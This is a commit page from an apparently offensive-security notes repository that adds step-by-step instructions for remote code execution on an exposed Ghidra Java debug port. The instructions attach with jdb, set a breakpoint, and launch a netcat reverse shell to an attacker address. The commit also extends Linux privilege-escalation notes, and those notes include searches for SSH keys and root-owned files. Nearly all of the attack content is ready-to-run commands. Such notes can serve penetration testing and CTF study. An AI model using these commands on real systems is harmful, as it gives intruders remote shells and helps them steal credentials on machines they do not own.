whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

added ghidra debugger exploit

This commit is contained in:
Stefan Friese 2022-01-03 00:43:31 +01:00
parent b6708156ab
commit b45e18400a
2 changed files with 23 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

19
exploit/java/ghidra_debug.md Normal file
View File

@ -0,0 +1,19 @@
# Ghidra Debug RCE
* If debug mode is enabled, connect to it via `jdb`
```sh
jdb -attach $TARGET_IP:$TARGET_PORT
```
```sh
classpath
classes
```
* Stop the service
```sh
stop in org.apache.logging.log4j.core.util.WatchManager$WatchRunnable.run()
```
* Wait until the breakpoint hits and start a reverse shell
```sh
print new java.lang.Runtime().exec("nc.traditional $ATTACKER_IP 4449 -e /bin/sh")
```

4
post_exploitation/priv_esc/docs/linux_priv_esc.md
View File

@ -34,6 +34,10 @@ find / -type f -name "authorized_keys" -o -name "id_rsa" 2>/dev/null
```
* [Shared object injection](../../../exploit/linux/shared_object_injection.md)
* [CVE-2016-1247](https://www.cvedetails.com/cve/CVE-2016-1247/)
* User specific files
```sh
find / -user root -name "*.txt"
```
## Sudo Binary
* [Baron Samedit](../../../exploit/linux/sudo/baron_samedit.md)